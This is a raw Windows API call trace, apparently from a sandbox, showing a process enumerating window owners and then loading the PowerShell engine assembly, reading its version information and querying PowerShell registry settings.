	[0202.137] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x448
	[0202.137] GetLastError () returned 0x0
	[0202.137] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x778
	[0202.137] GetLastError () returned 0x0
	[0202.137] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x458
	[0202.137] GetLastError () returned 0x0
	[0202.137] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x538
	[0202.137] GetLastError () returned 0x0
	[0202.138] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.138] GetLastError () returned 0x0
	[0202.138] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4ac
	[0202.138] GetLastError () returned 0x0
	[0202.138] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x938
	[0202.138] GetLastError () returned 0x0
	[0202.138] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7c8
	[0202.145] GetLastError () returned 0x0
	[0202.146] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xbdc
	[0202.146] GetLastError () returned 0x0
	[0202.146] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xbe0
	[0202.146] GetLastError () returned 0x0
	[0202.146] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9f4
	[0202.146] GetLastError () returned 0x0
	[0202.146] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x964
	[0202.146] GetLastError () returned 0x0
	[0202.146] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9e8
	[0202.146] GetLastError () returned 0x0
	[0202.147] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9e8
	[0202.147] GetLastError () returned 0x0
	[0202.147] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xb40
	[0202.147] GetLastError () returned 0x0
	[0202.147] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xa00
	[0202.147] GetLastError () returned 0x0
	[0202.147] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9f0
	[0202.147] GetLastError () returned 0x0
	[0202.148] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9e0
	[0202.148] GetLastError () returned 0x0
	[0202.148] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9d0
	[0202.148] GetLastError () returned 0x0
	[0202.148] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9c0
	[0202.148] GetLastError () returned 0x0
	[0202.148] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9b0
	[0202.148] GetLastError () returned 0x0
	[0202.148] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x9a0
	[0202.148] GetLastError () returned 0x0
	[0202.148] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x990
	[0202.148] GetLastError () returned 0x0
	[0202.149] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x980
	[0202.149] GetLastError () returned 0x0
	[0202.149] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x970
	[0202.149] GetLastError () returned 0x0
	[0202.149] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x960
	[0202.149] GetLastError () returned 0x0
	[0202.149] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x950
	[0202.149] GetLastError () returned 0x0
	[0202.149] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x940
	[0202.149] GetLastError () returned 0x0
	[0202.149] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x930
	[0202.149] GetLastError () returned 0x0
	[0202.150] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x920
	[0202.150] GetLastError () returned 0x0
	[0202.150] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x910
	[0202.150] GetLastError () returned 0x0
	[0202.150] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x900
	[0202.150] GetLastError () returned 0x0
	[0202.150] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8f0
	[0202.150] GetLastError () returned 0x0
	[0202.150] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8e0
	[0202.150] GetLastError () returned 0x0
	[0202.150] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8d0
	[0202.150] GetLastError () returned 0x0
	[0202.151] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8c0
	[0202.151] GetLastError () returned 0x0
	[0202.151] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8b0
	[0202.151] GetLastError () returned 0x0
	[0202.151] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x8a0
	[0202.151] GetLastError () returned 0x0
	[0202.151] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x890
	[0202.151] GetLastError () returned 0x0
	[0202.151] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x880
	[0202.151] GetLastError () returned 0x0
	[0202.151] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x870
	[0202.151] GetLastError () returned 0x0
	[0202.152] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x860
	[0202.152] GetLastError () returned 0x0
	[0202.152] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x850
	[0202.152] GetLastError () returned 0x0
	[0202.152] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x840
	[0202.152] GetLastError () returned 0x0
	[0202.152] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x830
	[0202.152] GetLastError () returned 0x0
	[0202.152] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x820
	[0202.152] GetLastError () returned 0x0
	[0202.152] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x810
	[0202.152] GetLastError () returned 0x0
	[0202.152] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x20c
	[0202.152] GetLastError () returned 0x0
	[0202.153] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7c4
	[0202.153] GetLastError () returned 0x0
	[0202.153] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0xc0
	[0202.153] GetLastError () returned 0x0
	[0202.153] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x688
	[0202.153] GetLastError () returned 0x0
	[0202.153] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x6c0
	[0202.153] GetLastError () returned 0x0
	[0202.153] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x408
	[0202.153] GetLastError () returned 0x0
	[0202.153] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7d4
	[0202.153] GetLastError () returned 0x0
	[0202.153] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x544
	[0202.153] GetLastError () returned 0x0
	[0202.154] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x540
	[0202.154] GetLastError () returned 0x0
	[0202.154] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x71c
	[0202.154] GetLastError () returned 0x0
	[0202.154] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x31c
	[0202.154] GetLastError () returned 0x0
	[0202.154] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7ec
	[0202.154] GetLastError () returned 0x0
	[0202.154] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x5b8
	[0202.154] GetLastError () returned 0x0
	[0202.154] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x754
	[0202.154] GetLastError () returned 0x0
	[0202.154] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x664
	[0202.154] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x640
	[0202.155] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x700
	[0202.155] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x410
	[0202.155] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7a0
	[0202.155] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x3b4
	[0202.155] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x5cc
	[0202.155] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x5d4
	[0202.155] GetLastError () returned 0x0
	[0202.155] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7c0
	[0202.156] GetLastError () returned 0x0
	[0202.156] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x364
	[0202.156] GetLastError () returned 0x0
	[0202.156] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x240
	[0202.156] GetLastError () returned 0x0
	[0202.156] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x560
	[0202.156] GetLastError () returned 0x0
	[0202.156] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x57c
	[0202.156] GetLastError () returned 0x0
	[0202.156] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x7b0
	[0202.156] GetLastError () returned 0x0
	[0202.156] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x6a4
	[0202.156] GetLastError () returned 0x0
	[0202.156] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x32c
	[0202.156] GetLastError () returned 0x0
	[0202.157] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x670
	[0202.157] GetLastError () returned 0x0
	[0202.157] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x50c
	[0202.157] GetLastError () returned 0x0
	[0202.157] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x514
	[0202.157] GetLastError () returned 0x0
	[0202.157] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4f0
	[0202.157] GetLastError () returned 0x0
	[0202.158] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x58c
	[0202.158] GetLastError () returned 0x0
	[0202.158] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x458
	[0202.158] GetLastError () returned 0x0
	[0202.158] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x4f4
	[0202.158] GetLastError () returned 0x0
	[0202.158] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x794
	[0202.158] GetLastError () returned 0x0
	[0202.158] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x458
	[0202.158] GetLastError () returned 0x0
	[0202.158] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xaeb00 | out: lpdwProcessId=0xaeb00) returned 0x778
	[0202.158] GetLastError () returned 0x0
	[0202.158] GetLastError () returned 0x0
	[0202.331] WerSetFlags () returned 0x0
	[0202.340] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0202.343] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xaeedc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xaeed8 | out: pulNumLanguages=0xaeedc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xaeed8) returned 1
	[0202.343] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xaeedc, pwszLanguagesBuffer=0x29585b0, pcchLanguagesBuffer=0xaeed8 | out: pulNumLanguages=0xaeedc, pwszLanguagesBuffer=0x29585b0, pcchLanguagesBuffer=0xaeed8) returned 1
	[0202.348] GetUserDefaultLocaleName (in: lpLocaleName=0x3582a0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0202.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.460] GetLastError () returned 0xcb
	[0202.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.464] GetLastError () returned 0xcb
	[0202.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.466] GetLastError () returned 0xcb
	[0202.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae94c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.478] GetLastError () returned 0xcb
	[0202.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.478] GetLastError () returned 0xcb
	[0202.478] SetErrorMode (uMode=0x1) returned 0x1
	[0202.478] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xaede8 | out: lpFileInformation=0xaede8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0202.479] GetLastError () returned 0xcb
	[0202.479] SetErrorMode (uMode=0x1) returned 0x1
	[0202.479] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xaee6c | out: lpdwHandle=0xaee6c) returned 0x94c
	[0202.480] GetLastError () returned 0x0
	[0202.480] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x295aae0 | out: lpData=0x295aae0) returned 1
	[0202.570] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaee38, puLen=0xaee34 | out: lplpBuffer=0xaee38*=0x295ab7c, puLen=0xaee34) returned 1
	[0202.570] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295ac58, puLen=0xaedb0) returned 1
	[0202.570] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0202.570] lstrcpyW (in: lpString1=0x3582a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0202.571] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295acac, puLen=0xaedb0) returned 1
	[0202.571] lstrlenW (lpString="System.Management.Automation") returned 28
	[0202.571] lstrcpyW (in: lpString1=0x3582a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0202.571] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295ad08, puLen=0xaedb0) returned 1
	[0202.571] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0202.571] lstrcpyW (in: lpString1=0x3582a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0202.571] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295ad48, puLen=0xaedb0) returned 1
	[0202.571] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0202.571] lstrcpyW (in: lpString1=0x3582a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0202.571] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295adb0, puLen=0xaedb0) returned 1
	[0202.571] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0202.571] lstrcpyW (in: lpString1=0x3582a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0202.571] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295ae4c, puLen=0xaedb0) returned 1
	[0202.571] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0202.572] lstrcpyW (in: lpString1=0x3582a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0202.572] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295aeb0, puLen=0xaedb0) returned 1
	[0202.572] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0202.572] lstrcpyW (in: lpString1=0x3582a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0202.572] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295af2c, puLen=0xaedb0) returned 1
	[0202.572] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0202.572] lstrcpyW (in: lpString1=0x3582a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0202.572] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x295abd4, puLen=0xaedb0) returned 1
	[0202.572] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0202.572] lstrcpyW (in: lpString1=0x3582a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0202.572] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x0, puLen=0xaedb0) returned 0
	[0202.573] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x0, puLen=0xaedb0) returned 0
	[0202.573] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xaedb4, puLen=0xaedb0 | out: lplpBuffer=0xaedb4*=0x0, puLen=0xaedb0) returned 0
	[0202.573] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaeda8, puLen=0xaeda4 | out: lplpBuffer=0xaeda8*=0x295ab7c, puLen=0xaeda4) returned 1
	[0202.573] VerLanguageNameW (in: wLang=0x0, szLang=0x3582a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0202.573] VerQueryValueW (in: pBlock=0x295aae0, lpSubBlock="\\", lplpBuffer=0xaedbc, puLen=0xaedb8 | out: lplpBuffer=0xaedbc*=0x295ab08, puLen=0xaedb8) returned 1
	[0202.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.582] GetLastError () returned 0xcb
	[0202.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.587] GetLastError () returned 0xcb
	[0202.593] lstrlenW (lpString="䅁") returned 1
	[0202.598] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xaed80 | out: phkResult=0xaed80*=0x32c) returned 0x0
	[0202.599] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xaed84 | out: phkResult=0xaed84*=0x330) returned 0x0
	[0202.599] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xaedb8 | out: phkResult=0xaedb8*=0x334) returned 0x0
	[0202.602] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaedf8, lpData=0x0, lpcbData=0xaedf4*=0x0 | out: lpType=0xaedf8*=0x1, lpData=0x0, lpcbData=0xaedf4*=0x56) returned 0x0
	[0202.604] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xaedf8, lpData=0x3582a0, lpcbData=0xaedf4*=0x56 | out: lpType=0xaedf8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xaedf4*=0x56) returned 0x0
	[0202.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.608] GetLastError () returned 0x0
	[0202.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.611] GetLastError () returned 0x0
